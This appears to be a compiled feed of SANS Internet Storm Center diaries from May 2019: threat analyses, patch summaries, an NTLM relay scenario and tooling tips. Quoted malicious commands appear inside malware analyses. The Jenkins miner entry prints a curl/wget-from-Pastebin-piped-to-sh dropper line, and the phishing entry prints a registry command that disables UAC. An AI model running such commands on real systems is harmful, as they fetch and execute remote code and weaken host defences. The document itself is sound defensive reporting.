Five years ago I wrote a diary how metadata could be used to detect suspicious activity. Obviously collecting packets allows the analyst to scrutinize the payload which allows in-depth analysis. However, with higher content being encrypted and the cost of storing terabyte of packets, more organization are now looking at a metadata-only approach to be good enough to respond to incidents.
Lately, I had discussion on what might be the "next generation of super tools" to help catch bad actors in a network. If you already have logs from many sources plus metadata with full packet capture at some key locations, using tools like User and Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) are becoming really effective in the network at catching bad actors are becoming in some cases, a replacement for full packet capture.
This appears to be true when combining data from sources such as network devices logs made available to review endpoint activities. Not that long ago, network forensic tools (NFTs) were storing everything in/out of a network as raw packets, but today’s fast networks is making this approach pretty much impractical for nearly everyone. This is where rich host and network metadata can capture most of the information required and provide much better investigative value for the money, it is easier and in most cases faster to find issues lurking in the network at a much lower computational and storage cost.
There are still some cases where metadata might be insufficient where packets capture might be required to complement the investigation but that is becoming rarer.
What do you think currently works best for you in detecting actors inside a network: logs, packets, UEBA, EDR or a combination of some of these tools?
ISC Stormcast For Friday, May 17th 2019 https://isc.sans.edu/podcastdetail.html?id=6502, (Fri, May 17th)
NTLM relay attacks have been a well-known opportunity to perform attacks against Microsoft Windows environments for a while and they remain usually successful. The magic with NTLM relay attacks? You don’t need to lose time to crack the hashes, just relay them to the victim machine. To achieve this, we need a “responder” that will capture the authentication session on a system and relay it to the victim. A lab is easy to setup: Install the Responder framework. The framework contains a tool called MultiRelay.py which helps to relay the captured NTLM authentication to a specific target and, if the attack is successful, execute some code! (There are plenty of blog posts that explain in details how to (ab)use of this attack scenario).
Once you deployed all tools, you need to wait for an “interesting” user to connect on the infected system. How to find such kind of juicy users credentials? Most vulnerability scanners propose different scanning modes. The classic one is a non-authenticated scan based on available ports (compare this to a penetration test in "black box" mode). In many organizations, scans are performed in "authenticated mode". This time, the scanner has credentials to connect to targets and is, therefore, able to access more information like the list of installed applications (compare this to a penetration test in "grey box" mode). See the example below with the free scanner OpenVAS:
You can configure OpenVAS to collect information via SSH, SMB, SNMP or even connect to a VMware hypervisor. To achieve this, you need to provide valid credentials that have enough access rights to perform basic tasks on the scanned hosts.
I was aware of a case where attackers implemented an NTLM relay on a first victim's host and waited for some SMB authentication. The vulnerability scanner used credentials to perform an authenticated scan and its connection details were automatically reused to pivot internally and infect more hosts. Seen that such users have more rights to do their job, it's always an interesting candidate for attackers.
So keep in mind that using security tools could also introduce some new risks! By the way, how to protect yourself against this type of attack? Use SMBv3 and enable SMB signing!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Thursday, May 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6500, (Thu, May 16th)
ISC Stormcast For Wednesday, May 15th 2019 https://isc.sans.edu/podcastdetail.html?id=6498, (Wed, May 15th)
VMWare just released a security update to address a DLL-hijacking issue affecting VMware Workstation Pro / Player. Details: https://www.vmware.com/security/advisories/VMSA-2019-0007.html, (Tue, May 14th)
This month we got patches for 79 vulnerabilities from Microsoft and 2 from Adobe. From those, 23 are critical and 2 were previously known - including the one that has been exploited in the wild.
The exploited vulnerability (CVE-2019-0863) affects the way Windows Error Reporting (WER) handles files. It may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. The CVSS V3 for this vulnerability is 7.8.
The other previously known (CVE-2019-0932) is an information disclosure vulnerability which affects Skype for Android. Exploiting this vulnerability, an attacker could listen to the conversation of a Skype for Android without the user’s knowledge.
Amongst critical vulnerabilities, it worth mentioning a remote code execution in Windows Remote Desktop Services (CVE-2019-0708). An unauthenticated attacker may exploit this vulnerability by sending specially crafted packets to the vulnerable service and then execute arbitrary code on the target system. It affects Windows 7 and Windows Server 2008. The CVSS V3 score for this vulnerability is 9.8.
Last but not least, we have a new critical remote execution vulnerability affecting GDI+ (Windows Graphics Device Interface). An attacker could exploit this vulnerability by convincing the user to open a specially crafted attachment in an e-mail or instant messenger, for example. The CVSS V3 for this vulnerability is 8.8.
See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.comADV990001 No No - - Critical May 2019 Adobe Flash Security Update ADV190012 No No - - Critical Microsoft Azure AD Connect Elevation of Privilege Vulnerability %%cve:2019-1000%% No No Less Likely Less Likely Important Microsoft Browser Memory Corruption Vulnerability %%cve:2019-0940%% No No More Likely More Likely Critical 7.5 6.7 Microsoft Dynamics On-Premise Security Feature Bypass %%cve:2019-1008%% No No Less Likely Less Likely Important Microsoft Edge Elevation of Privilege Vulnerability %%cve:2019-0938%% No No - - Important 4.2 3.8 Microsoft Edge Memory Corruption Vulnerability %%cve:2019-0926%% No No - - Critical 4.2 3.8 Microsoft Guidance to mitigate Microarchitectural Data Sampling vulnerabilities ADV190013 No No More Likely More Likely Important Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability %%cve:2019-0945%% No No Less Likely Less Likely Important %%cve:2019-0946%% No No Less Likely Less Likely Important %%cve:2019-0947%% No No - - Important Microsoft Office SharePoint XSS Vulnerability %%cve:2019-0963%% No No - - Important Microsoft SQL Server Analysis Services Information Disclosure Vulnerability %%cve:2019-0819%% No No Less Likely Less Likely Important Microsoft SharePoint Elevation of Privilege Vulnerability %%cve:2019-0957%% No No Less Likely Less Likely Important %%cve:2019-0958%% No No Less Likely Less Likely Important Microsoft SharePoint Server Information Disclosure Vulnerability %%cve:2019-0956%% No No - - Important Microsoft SharePoint Server Remote Code Execution Vulnerability %%cve:2019-0952%% No No - - Important Microsoft SharePoint Spoofing Vulnerability %%cve:2019-0949%% No No - - Important %%cve:2019-0950%% No No - - Important %%cve:2019-0951%% No No - - Important Microsoft Word Remote Code Execution Vulnerability %%cve:2019-0953%% No No Less Likely Less Likely Critical NuGet Package Manager Tampering Vulnerability %%cve:2019-0976%% No No Less Likely Less Likely Important Remote Desktop Services Remote Code Execution Vulnerability %%cve:2019-0708%% No No - - Critical 9.8 8.8 Scripting Engine Memory Corruption Vulnerability %%cve:2019-0884%% No No More Likely More Likely Critical 6.4 5.8 %%cve:2019-0911%% No No More Likely More Likely Critical 7.5 6.7 %%cve:2019-0918%% No No More Likely More Likely Critical 7.5 6.7 Skype for Android Information Disclosure Vulnerability %%cve:2019-0932%% Yes No Less Likely Less Likely Important Unified Write Filter Elevation of Privilege Vulnerability %%cve:2019-0942%% No No Less Likely Less Likely Important 4.4 4.0 Win32k Elevation of Privilege Vulnerability %%cve:2019-0892%% No No More Likely More Likely Important 7.8 7.0 Windows DHCP Server Remote Code Execution Vulnerability %%cve:2019-0725%% No No Less Likely Less Likely Critical 8.1 7.3 Windows Defender Application Control Security Feature Bypass Vulnerability %%cve:2019-0733%% No No Less Likely Less Likely Important 5.3 4.8 Windows Elevation of Privilege Vulnerability %%cve:2019-0734%% No No Less Likely Less Likely Important 7.8 7.0 %%cve:2019-0936%% No No More Likely More Likely Important 7.8 7.0 Windows Error Reporting Elevation of Privilege Vulnerability %%cve:2019-0863%% Yes Yes Detected Detected Important 7.8 7.0 Windows GDI Information Disclosure Vulnerability %%cve:2019-0882%% No No More Likely More Likely Important 4.7 4.2 %%cve:2019-0961%% No No More Likely More Likely Important 4.7 4.2 %%cve:2019-0758%% No No More Likely More Likely Important 4.7 4.2 Windows Hyper-V Information Disclosure Vulnerability %%cve:2019-0886%% No No Less Likely Less Likely Important 5.5 5.0 Windows Kernel Elevation of Privilege Vulnerability %%cve:2019-0881%% No No More Likely More Likely Important 8.8 7.9 Windows NDIS Elevation of Privilege Vulnerability %%cve:2019-0707%% No No More Likely More Likely Important 7.0 6.3 Windows OLE Remote Code Execution Vulnerability %%cve:2019-0885%% No No More Likely More Likely Important 7.8 7.0 Windows Storage Service Elevation of Privilege Vulnerability %%cve:2019-0931%% No No More Likely More Likely Important 7.0 6.3
ISC Stormcast For Tuesday, May 14th 2019 https://isc.sans.edu/podcastdetail.html?id=6496, (Tue, May 14th)
On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, those emails are simply part of classic phishing waves and try to steal credentials from victims but, this time, it was not a simple phishing. Here is a copy of the email, which was nicely redacted:
When the victim clicks on thee "Review and take action" button, (s)he is redirected to a first website:hxxp://xoxouload[.]ml
This automatically redirects to a second site via a HTTP/301 code:hxxp://217[.]199[.187[.]73/verifiedvsa.com/www.office365.com/OneDrive.htm
The following picture is displayed:
Yes, this is just a simple picture, no links are active. Where is the issue? Two seconds after that page has been loaded, the browser asks the victim to save a file. The HTML code contains indeed a new redirect:<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">
The shortened URL links to:hxxp://lichxuanohha[.]com/wp-content/themes/xcx/i47.php
This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the fist time on Friday, it was unknown on VT. Since, it has been uploaded by someone else and has a score of 47/71. The file is identified by many AV's as a Banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:
I search for this email address and found a Tweet by @malwarehunterteam from April 25:
Some actions performed by the malware:C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\
This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs" "C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
I saw many files created on the Desktop with filenames "lock_<randomstring>.<extension> but the honeypot files were not encrypted. I'm still having a look at the sample.
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Monday, May 13th 2019 https://isc.sans.edu/podcastdetail.html?id=6494, (Mon, May 13th)
If you follow us and read our daily diaries, you probably already know some famous tools developed by Didier (like oledump.py, translate.py and many more). Didier is using them all the time to analyze malicious documents. His tools are also used by many security analysts and researchers. The complete toolbox is available on his github.com page. You can clone the repository or download the complete package available as a zip archive. However, it’s not convenient to install them all the time when you’re switching from computers all the time if, like me, you’re always on the road between different customers.
Being a fan of Docker containers, I built a Docker image called “DSSuite” (a not very original name :-) that contains all Didier’s tools preinstalled and ready to use from any system that has Docker available. The image is available on hub.docker.com.
To use it, just pull the image:$ docker pull rootshell/dssuite
Once done, you can use tools directly from Docker or start an interactive shell. First, let’s try a simple oledump against a sample OLE file:$ file malicious_ole.vir malicious_ole.vir: Composite Document File V2 Document, Cannot read section info $ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious_ole.vir 1: O 49737 '\x01Ole10Native' 2: 6 '\x03ObjInfo’
If you don’t pass arguments to the container, an interactive shell will be started:$ docker run -it -v $(pwd):/malware rootshell/dssuite ____ ____ ____ _ _ | _ \/ ___/ ___| _ _(_) |_ ___ | | | \___ \___ \| | | | | __/ _ \ | |_| |___) |__) | |_| | | || __/ |____/|____/____/ \__,_|_|\__\___| Version 1.0 - Help: https://blog.didierstevens.com/my-software/ root@a43d72df1d9b:/malware#
Note that you need to map a /malware volume to access the malicious files to analyze
For more convenience, just create an alias like this in your shell to call directly the commands:$ alias dssuite='docker run -it --rm -v $(pwd):/malware rootshell/dssuite $@‘ $ dssuite oledump.py sample.doc
Most of the tools are running out of the box but let me know if you detect some issues and I'll keep the Docker updated
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
ISC Stormcast For Friday, May 10th 2019 https://isc.sans.edu/podcastdetail.html?id=6492, (Fri, May 10th)
ISC Stormcast For Thursday, May 9th 2019 https://isc.sans.edu/podcastdetail.html?id=6490, (Thu, May 9th)
ISC Stormcast For Wednesday, May 8th 2019 https://isc.sans.edu/podcastdetail.html?id=6488, (Wed, May 8th)
For today's diary I play a game of email roulette. My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware. I acquired a recent malspam example through VirusTotal (VT) Intelligence. Let's see what the roulette wheel give us today!
Searching for malspam attachments in VT Intelligence
VT Intelligence is a subscription server, and from what I understand, it's fairly expensive. Fortunately I have access through my employer. In the VT Intelligence search window, I used the following parameters:
tag:attachment fs:2019-05-07+ p:3+
This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious. After the results appeared, I sorted by the most recent submissions.
The three most recent results I saw were 7-zip archives (.7z files). The file names did not use ASCII characters, but were base64 encoded. The base64 string represents UTF-8 characters, where the format is name:"=?utf-8?B?[base64 string]?="
I picked the most recent result and selected the relations tab, which revealed the associated malspam. Then I retrieved that email from VT Intelligence.
The attached 7-zip archive contained 3 files with different names, but they were all the same file hash, so they were the same malware. I extracted them and ran one on a vulnerable Windows host. The result was a Gandcrab ransomware infection.
The following are indicators associated with this infection:
- File size: 157,810 bytes
- File description: Example of Korean malspam (.eml file) pushing Gandcrab
- File size: 112,792 bytes
- File description: 7-zip archive (.7z file) attached to Korean malspam
- File size: 173,568 bytes
- File description: Gandcrab executables (.exe files) extracted from the above .7z archive
- Any.Run sandbox analysis
This round of email roulette gave us a Gandcrab ransomware infection. What type of malware might I find next? Perhaps we'll know when I try this again next month for another diary.
brad [at] malware-traffic-analysis.net
An ongoing malicious campaign is looking for vulnerable Apache Jenkins installations to deploy a Monero cryptominer. The dropper uses sophisticated techniques to hide its presence on the system, to move laterally and to look for new victims on the internet. It also downloads and runs the miner software – of course.
The exploited vulnerability, CVE-2018-1000861 , was published in December 2018. It affects Stapler Web framework used by Jenkins 2.153 and earlier. It may allow attackers to invoke methods on Java objects by accessing crafted URLs.
Looking for publicly available exploits for this vulnerability, I could find a detailed proof of concept published early March this year.
After analyzing the threat which attacked one of my honeypots, I created the diagram shown in the picture below. Follow the numbers in blue to understand each step.
In the picture below, you can see the exploitation occurring.
Notice that there is a base64 encoded content piped to bash for execution. Decoding this content, it was possible to see that this campaign is using Pastebin as the C2:
(curl -fsSL hxxps://pastebin[.]com/raw/wDBa7jCQ||wget -q -O- hxxps://pastebin[.]com/raw/wDBa7jCQ)|sh
The content of the paste ‘wDBa7jCQ’ is no longer available, but the content was another paste:
(curl -fsSL hxxps://pastebin[.]com/raw/D8E71JBJ||wget -q -O- hxxps://pastebin[.]com/raw/D8E71JBJ)|sed 's/\r//'|sh
The content of ‘D8E71JBJ’ paste is no longer available also, but it was the shell script down in following images.
The dropper named “Kerberods” (not “Kerberos” as the protocol) caught my attention due to the way it is packed and the way it acts if it has ‘root’ privileges on the machine.
After analyzing the binary, I could see that the packer used was a custom version of ‘UPX’. UPX is an open source software and there are many ways UPX can be modified to make it hard to unpack the file using regular UPX version. There is a great presentation on this subject by @unixfreaxjp  called ‘Unpacking the non-unpackable’ which shows different forms to fix ELF headers in order to unpack files.
Fortunately, in this case, the UPX customizations involved just the modification of the magic constant UPX_MAGIC_LE32 from 'UPX' to some other three letters. Thus, reverting it to UPX in different parts of the binary, it was possible to unpack the binary with the regular version of UPX.
The Glibc hooks
The other interesting part is the way ‘Kerberods’ acts to persist and hide itself if has root privileges on the machine.
If it is the case, it drops, compiles and loads a library into the operating system that hooks different functions of Glibc to modify its behavior. In other words, it acts like a rootkit.
In the image below it is possible to see that the function ‘open’ will now check for some strings in the ‘pathname’ to act in a different way. The intention is to avoid anyone (including root) to be able to open the binary ‘khugepageds’, which is the cryptominer, the ‘ld.so.preload’, which is the file that loads the malicious library and the library ‘libpamcd.so’ itself.
Another hook, to show one more example, hides the network connection to the private mining pool and the scan for open Redis servers, as seen in the image below.
Indicators of Compromise (IOCs)
ISC Stormcast For Tuesday, May 7th 2019 https://isc.sans.edu/podcastdetail.html?id=6486, (Tue, May 7th)
I gave a few tips over the last weeks to help friends with processing files. Turned out that each time, UNICODE was involved.
Xavier had an issue with a malicious UDF file. I took a look with a binary editor:
Command file confirmed the endianness:
The fact that it contains just null bytes is unusual, but then again, this is actually not a text file, but an UDF file that was probably opened and saved with a text editor.
Another friend had a problem having a an XML file parsed by a SIEM. It threw an unusual, obscure error. It turned out here too, that the file was UNICODE, while the SIEM expected an ASCII file.
When opening text files with an editor, it's often not trivial to determine the encoding of the file. And not everyone is comfortable using an hexadecimal error.
If you want a command-line tool, I recommend the file command.
For a GUI tool on Windows, you can use the free text editor Notepad++.
It displays the encoding of the displayed file in its status bar:
LE BOM tells us that the file contains a BOM and is little endian. UCS-2 (an ISO standard equivalent with UNICODE and the basis for UTF-16). And we get bonus information: the line separator is carriage return / linefeed (CR LF). This was something Xavier had to deal with too.
This editor can of course convert encodings:
ISC Stormcast For Monday, May 6th 2019 https://isc.sans.edu/podcastdetail.html?id=6484, (Sun, May 5th)
In this entry in my series, I'll look at a few more of the features I regularly use in IDA and how to accomplish the same in Ghidra.
The first one is simple conversion. In this case, hex to ASCII characters (classic stack strings stuff that we cover in Day 5 of FOR610). I miss IDA's 'R' key mapping, but that is currently taken by View/Edit References From. You can change that or create your own key mapping, Ctrl-Alt-R isn't currently taken, so that's what I use. Just like in IDA, you can right-click on the value, but then you have to choose Convert and then Char from the submenu.
Another of the features I use regularly, is renaming arguments, variables, and functions as I begin to figure out their purposes. In IDA, this is the 'N' key, in Ghidra, it is the 'L' key for Label. It works exactly like in IDA. In the screenshot below, you'll see it in the right-click menu.
And below is the actual dialog to do the renaming.
And, the last functionality I want to cover in this post is comments. There are 4 (well, 5) types of comments that you can create with Ghidra. Pre-comments which will appear above the instruction where you place it, post-comments which appear below, EOL (and repeatable) comments at the end of the line, and Plate comments, which change the generic "Function" comment at the top of the function. I actually like some of the additions, especially the plate comment which can be used to fill in info on what I've discovered about the functionality of the function in question.
And here are examples of each
I've got at least one more post in this series, probably next week. As with the others, if you have any tips, comments, corrections, etc. let me know via our contact page, e-mail, or via the comments below. Until next time,...
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu